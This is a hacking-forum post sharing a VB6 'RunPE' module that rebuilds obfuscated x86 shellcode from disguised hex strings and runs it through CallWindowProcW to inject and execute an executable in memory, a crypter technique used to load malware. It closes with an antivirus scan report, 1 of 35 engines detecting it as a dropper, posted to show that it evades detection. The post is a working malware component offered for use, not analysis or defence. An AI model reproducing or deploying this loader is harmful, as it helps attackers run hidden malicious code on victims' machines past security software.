Jump to content
io.kent

mshRunPe Mod vb6

By io.kent, in Programare

Recommended Posts

io.kent Newbie

io.kent

Posted
Posted 

Option Explicit

'---------------------------------------------------------------------------------------
' Module    : mshRunPE_Strings
' Author    : iCodeInVB6
' Now       : 05/16/2012 11:40
' Purpose   : Run executable in memory
'             Only uses CallWindowProc & shellcode
' Credits   : hamavb <-- made the shellcode!
' Tested    : Win7 x64
' Mod by    : Himanen
'---------------------------------------------------------------------------------------

'USER32
Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long

Private s_ASM(7) As String
Private b_ASM(1287) As Byte

Public Sub RunPE(ByVal TargetHost As String, bBuffer() As Byte)
    Dim i As Long
    Dim j As Long
    Dim k As Long

    s_ASM(0) = "LM\60LM\E8LM\4ELM\00LM\00LM\00LM\6BLM\00LM\65LM\00LM\72LM\00LM\6ELM\00LM\65LM\00LM\6CLM\00LM\33LM\00LM\32LM\00LM\00LM\00LM\6ELM\00LM\74LM\00LM\64LM\00LM\6CLM\00LM\6CLM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\5BLM\8BLM\FCLM\6ALM\42LM\E8LM\BBLM\03LM\00LM\00LM\8BLM\54LM\24LM\28LM\89LM\11LM\8BLM\54LM\24LM\2CLM\6ALM\3ELM\E8LM\AALM\03LM\00LM\00LM\89LM\11LM\6ALM\4ALM\E8LM\A1LM\03LM\00LM\00LM\89LM\39LM\6ALM\1ELM\6ALM\3CLM\E8LM\9DLM\03LM\00LM\00LM\6ALM\22LM\68LM\F4LM\00LM\00LM\00LM\E8LM\91LM\03LM\00LM\00LM\6ALM\26LM\6ALM\24LM\E8LM\88LM\03LM\00LM\00LM\6ALM\2ALM\6ALM\40LM\E8LM\7FLM\03LM\00LM\00"
    s_ASM(1) = "LM\6ALM\2ELM\6ALM\0CLM\E8LM\76LM\03LM\00LM\00LM\6ALM\32LM\68LM\C8LM\00LM\00LM\00LM\E8LM\6ALM\03LM\00LM\00LM\6ALM\2ALM\E8LM\5CLM\03LM\00LM\00LM\8BLM\09LM\C7LM\01LM\44LM\00LM\00LM\00LM\6ALM\12LM\E8LM\4DLM\03LM\00LM\00LM\68LM\5BLM\E8LM\14LM\CFLM\51LM\E8LM\79LM\03LM\00LM\00LM\6ALM\3ELM\E8LM\3BLM\03LM\00LM\00LM\8BLM\D1LM\6ALM\1ELM\E8LM\32LM\03LM\00LM\00LM\6ALM\40LM\FFLM\32LM\FFLM\31LM\FFLM\D0LM\6ALM\12LM\E8LM\23LM\03LM\00LM\00LM\68LM\5BLM\E8LM\14LM\CFLM\51LM\E8LM\4FLM\03LM\00LM\00LM\6ALM\1ELM\E8LM\11LM\03LM\00LM\00LM\8BLM\09LM\8BLM\51LM\3CLM\6ALM\3ELM\E8LM\05LM\03LM\00LM\00LM\8BLM\39LM\03LM\FALM\6ALM\22LM\E8LM\FALM\02LM\00LM\00LM\8BLM\09LM\68LM\F8LM\00LM\00LM\00LM\57LM\51LM\FFLM\D0LM\6ALM\00LM\E8LM\E8LM\02LM\00LM\00LM\68LM\88LM\FELM\B3LM\16LM\51LM\E8LM\14LM\03LM\00LM\00LM\6ALM\2ELM\E8LM\D6LM\02LM\00"
    s_ASM(2) = "LM\00LM\8BLM\39LM\6ALM\2ALM\E8LM\CDLM\02LM\00LM\00LM\8BLM\11LM\6ALM\42LM\E8LM\C4LM\02LM\00LM\00LM\57LM\52LM\6ALM\00LM\6ALM\00LM\6ALM\04LM\6ALM\00LM\6ALM\00LM\6ALM\00LM\6ALM\00LM\FFLM\31LM\FFLM\D0LM\6ALM\12LM\E8LM\A9LM\02LM\00LM\00LM\68LM\D0LM\37LM\10LM\F2LM\51LM\E8LM\D5LM\02LM\00LM\00LM\6ALM\22LM\E8LM\97LM\02LM\00LM\00LM\8BLM\11LM\6ALM\2ELM\E8LM\8ELM\02LM\00LM\00LM\8BLM\09LM\FFLM\72LM\34LM\FFLM\31LM\FFLM\D0LM\6ALM\00LM\E8LM\7ELM\02LM\00LM\00LM\68LM\9CLM\95LM\1ALM\6ELM\51LM\E8LM\AALM\02LM\00LM\00LM\6ALM\22LM\E8LM\6CLM\02LM\00LM\00LM\8BLM\11LM\8BLM\39LM\6ALM\2ELM\E8LM\61LM\02LM\00LM\00LM\8BLM\09LM\6ALM\40LM\68LM\00LM\30LM\00LM\00LM\FFLM\72LM\50LM\FFLM\77LM\34LM\FFLM\31LM\FFLM\D0LM\6ALM\36LM\E8LM\47LM\02LM\00LM\00LM\8BLM\D1LM\6ALM\22LM\E8LM\3ELM\02LM\00LM\00LM\8BLM\39LM\6ALM\3ELM\E8LM\35LM\02LM\00"
    s_ASM(3) = "LM\00LM\8BLM\31LM\6ALM\22LM\E8LM\2CLM\02LM\00LM\00LM\8BLM\01LM\6ALM\2ELM\E8LM\23LM\02LM\00LM\00LM\8BLM\09LM\52LM\FFLM\77LM\54LM\56LM\FFLM\70LM\34LM\FFLM\31LM\6ALM\00LM\E8LM\10LM\02LM\00LM\00LM\68LM\A1LM\6ALM\3DLM\D8LM\51LM\E8LM\3CLM\02LM\00LM\00LM\83LM\C4LM\0CLM\FFLM\D0LM\6ALM\12LM\E8LM\F9LM\01LM\00LM\00LM\68LM\5BLM\E8LM\14LM\CFLM\51LM\E8LM\25LM\02LM\00LM\00LM\6ALM\22LM\E8LM\E7LM\01LM\00LM\00LM\8BLM\11LM\83LM\C2LM\06LM\6ALM\3ALM\E8LM\DBLM\01LM\00LM\00LM\6ALM\02LM\52LM\51LM\FFLM\D0LM\6ALM\36LM\E8LM\CELM\01LM\00LM\00LM\C7LM\01LM\00LM\00LM\00LM\00LM\B8LM\28LM\00LM\00LM\00LM\6ALM\36LM\E8LM\BCLM\01LM\00LM\00LM\F7LM\21LM\6ALM\1ELM\E8LM\B3LM\01LM\00LM\00LM\8BLM\11LM\8BLM\52LM\3CLM\81LM\C2LM\F8LM\00LM\00LM\00LM\03LM\D0LM\6ALM\3ELM\E8LM\9FLM\01LM\00LM\00LM\03LM\11LM\6ALM\26LM\E8LM\96LM\01LM\00LM\00LM\6A"
    s_ASM(4) = "LM\28LM\52LM\FFLM\31LM\6ALM\12LM\E8LM\8ALM\01LM\00LM\00LM\68LM\5BLM\E8LM\14LM\CFLM\51LM\E8LM\B6LM\01LM\00LM\00LM\83LM\C4LM\0CLM\FFLM\D0LM\6ALM\26LM\E8LM\73LM\01LM\00LM\00LM\8BLM\39LM\8BLM\09LM\8BLM\71LM\14LM\6ALM\3ELM\E8LM\65LM\01LM\00LM\00LM\03LM\31LM\6ALM\26LM\E8LM\5CLM\01LM\00LM\00LM\8BLM\09LM\8BLM\51LM\0CLM\6ALM\22LM\E8LM\50LM\01LM\00LM\00LM\8BLM\09LM\03LM\51LM\34LM\6ALM\46LM\E8LM\44LM\01LM\00LM\00LM\8BLM\C1LM\6ALM\2ELM\E8LM\3BLM\01LM\00LM\00LM\8BLM\09LM\50LM\FFLM\77LM\10LM\56LM\52LM\FFLM\31LM\6ALM\00LM\E8LM\2ALM\01LM\00LM\00LM\68LM\A1LM\6ALM\3DLM\D8LM\51LM\E8LM\56LM\01LM\00LM\00LM\83LM\C4LM\0CLM\FFLM\D0LM\6ALM\36LM\E8LM\13LM\01LM\00LM\00LM\8BLM\11LM\83LM\C2LM\01LM\89LM\11LM\6ALM\3ALM\E8LM\05LM\01LM\00LM\00LM\8BLM\09LM\3BLM\CALM\0FLM\85LM\33LM\FFLM\FFLM\FFLM\6ALM\32LM\E8LM\F4LM\00LM\00LM\00"
    s_ASM(5) = "LM\8BLM\09LM\C7LM\01LM\07LM\00LM\01LM\00LM\6ALM\00LM\E8LM\E5LM\00LM\00LM\00LM\68LM\D2LM\C7LM\A7LM\68LM\51LM\E8LM\11LM\01LM\00LM\00LM\6ALM\32LM\E8LM\D3LM\00LM\00LM\00LM\8BLM\11LM\6ALM\2ELM\E8LM\CALM\00LM\00LM\00LM\8BLM\09LM\52LM\FFLM\71LM\04LM\FFLM\D0LM\6ALM\22LM\E8LM\BBLM\00LM\00LM\00LM\8BLM\39LM\83LM\C7LM\34LM\6ALM\32LM\E8LM\AFLM\00LM\00LM\00LM\8BLM\31LM\8BLM\B6LM\A4LM\00LM\00LM\00LM\83LM\C6LM\08LM\6ALM\2ELM\E8LM\9DLM\00LM\00LM\00LM\8BLM\11LM\6ALM\46LM\E8LM\94LM\00LM\00LM\00LM\51LM\6ALM\04LM\57LM\56LM\FFLM\32LM\6ALM\00LM\E8LM\86LM\00LM\00LM\00LM\68LM\A1LM\6ALM\3DLM\D8LM\51LM\E8LM\B2LM\00LM\00LM\00LM\83LM\C4LM\0CLM\FFLM\D0LM\6ALM\22LM\E8LM\6FLM\00LM\00LM\00LM\8BLM\09LM\8BLM\51LM\28LM\03LM\51LM\34LM\6ALM\32LM\E8LM\60LM\00LM\00LM\00LM\8BLM\09LM\81LM\C1LM\B0LM\00LM\00LM\00LM\89LM\11LM\6ALM\00LM\E8"
    s_ASM(6) = "LM\4FLM\00LM\00LM\00LM\68LM\D3LM\C7LM\A7LM\E8LM\51LM\E8LM\7BLM\00LM\00LM\00LM\6ALM\32LM\E8LM\3DLM\00LM\00LM\00LM\8BLM\D1LM\6ALM\2ELM\E8LM\34LM\00LM\00LM\00LM\8BLM\09LM\FFLM\32LM\FFLM\71LM\04LM\FFLM\D0LM\6ALM\00LM\E8LM\24LM\00LM\00LM\00LM\68LM\88LM\3FLM\4ALM\9ELM\51LM\E8LM\50LM\00LM\00LM\00LM\6ALM\2ELM\E8LM\12LM\00LM\00LM\00LM\8BLM\09LM\FFLM\71LM\04LM\FFLM\D0LM\6ALM\4ALM\E8LM\04LM\00LM\00LM\00LM\8BLM\21LM\61LM\C3LM\8BLM\CBLM\03LM\4CLM\24LM\04LM\C3LM\6ALM\00LM\E8LM\F2LM\FFLM\FFLM\FFLM\68LM\54LM\CALM\AFLM\91LM\51LM\E8LM\1ELM\00LM\00LM\00LM\6ALM\40LM\68LM\00LM\10LM\00LM\00LM\FFLM\74LM\24LM\18LM\6ALM\00LM\FFLM\D0LM\FFLM\74LM\24LM\14LM\E8LM\CFLM\FFLM\FFLM\FFLM\89LM\01LM\83LM\C4LM\10LM\C3LM\E8LM\22LM\00LM\00LM\00LM\68LM\A4LM\4ELM\0ELM\ECLM\50LM\E8LM\4BLM\00LM\00LM\00LM\83LM\C4LM\08LM\FFLM\74LM\24LM\04"
    s_ASM(7) = "LM\FFLM\D0LM\FFLM\74LM\24LM\08LM\50LM\E8LM\38LM\00LM\00LM\00LM\83LM\C4LM\08LM\C3LM\55LM\52LM\51LM\53LM\56LM\57LM\33LM\C0LM\64LM\8BLM\70LM\30LM\8BLM\76LM\0CLM\8BLM\76LM\1CLM\8BLM\6ELM\08LM\8BLM\7ELM\20LM\8BLM\36LM\38LM\47LM\18LM\75LM\F3LM\80LM\3FLM\6BLM\74LM\07LM\80LM\3FLM\4BLM\74LM\02LM\EBLM\E7LM\8BLM\C5LM\5FLM\5ELM\5BLM\59LM\5ALM\5DLM\C3LM\55LM\52LM\51LM\53LM\56LM\57LM\8BLM\6CLM\24LM\1CLM\85LM\EDLM\74LM\43LM\8BLM\45LM\3CLM\8BLM\54LM\28LM\78LM\03LM\D5LM\8BLM\4ALM\18LM\8BLM\5ALM\20LM\03LM\DDLM\E3LM\30LM\49LM\8BLM\34LM\8BLM\03LM\F5LM\33LM\FFLM\33LM\C0LM\FCLM\ACLM\84LM\C0LM\74LM\07LM\C1LM\CFLM\0DLM\03LM\F8LM\EBLM\F4LM\3BLM\7CLM\24LM\20LM\75LM\E1LM\8BLM\5ALM\24LM\03LM\DDLM\66LM\8BLM\0CLM\4BLM\8BLM\5ALM\1CLM\03LM\DDLM\8BLM\04LM\8BLM\03LM\C5LM\5FLM\5ELM\5BLM\59LM\5ALM\5DLM\C3LM\C3LM\00LM\00LM\00LM\00"

    For i = 0 To 7
        For j = 1 To 805 Step 5
            b_ASM(k) = Replace(Mid(s_ASM(i), j, 5), "LM\", Chr(Val("38")) & Chr(Val("72"))): k = k + 1
        Next j
    Next i

    CallWindowProcW VarPtr(b_ASM(0)), StrPtr(TargetHost), VarPtr(bBuffer(0)), 0, 0

End Sub

Tipo de reporte: Analizar Fichero
Fecha/Hora: 24/01/2013 12:17:19 UTC
Fichero: sin.exe
Tamaño: 32768 KB
MD5: 0952D1363A1E03F81166170962894CF6
Detecciones:[COLOR="#FF0000"]1/35
Estado: INFECTADO[/COLOR]

AVG Free: Limpio
ArcaVir: Limpio
Avast 5: Limpio
[COLOR="#FF0000"]AntiVir (Avira): TR/Dropper.Gen[/COLOR]
BitDefender: Limpio
VirusBuster Internet Security: Limpio
Clam Antivirus: Limpio
COMODO Internet Security: Limpio
Dr.Web: Limpio
eTrust-Vet: Limpio
F-PROT Antivirus: Limpio
F-Secure Internet Security: Limpio
G Data: Limpio
IKARUS Security: Limpio
Kaspersky Antivirus: Limpio
McAfee: Limpio
MS Security Essentials: Limpio
ESET NOD32: Limpio
Norman: Limpio
Norton Antivirus: Limpio
Panda Security: Limpio
A-Squared: Limpio
Quick Heal Antivirus: Limpio
Solo Antivirus: Limpio
Sophos: Limpio
Trend Micro Internet Security: Limpio
VBA32 Antivirus: Limpio
Vexira Antivirus: Limpio
Zoner AntiVirus: Limpio
Ad-Aware: Limpio
BullGuard: Limpio
Immunet Antivirus: Limpio
K7 Ultimate: Limpio
NANO Antivirus: Limpio
VIPRE: Limpio

  • Upvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...